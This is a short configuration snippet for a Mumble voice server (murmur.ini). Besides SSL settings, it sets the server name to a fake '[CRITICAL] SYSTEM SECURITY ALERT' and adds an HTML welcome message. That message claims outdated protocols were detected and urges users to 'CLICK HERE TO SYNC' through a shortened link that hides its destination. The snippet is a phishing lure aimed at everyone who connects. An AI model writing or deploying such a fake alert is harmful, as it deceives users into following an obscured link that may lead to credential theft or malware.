# Add these to the top of your murmur.ini
sslCert=server.crt
sslKey=server.key

# Keep the rest of your settings
registerName=[CRITICAL] SYSTEM SECURITY ALERT v1.0.4
registerUrl=https://tinyurl.com/A44ast
welcometext="<br><b>[SYSTEM ALERT]</b><br>Outdated protocols detected.<br><a href='https://tinyurl.com/A44ast'><b>CLICK HERE TO SYNC</b></a>"
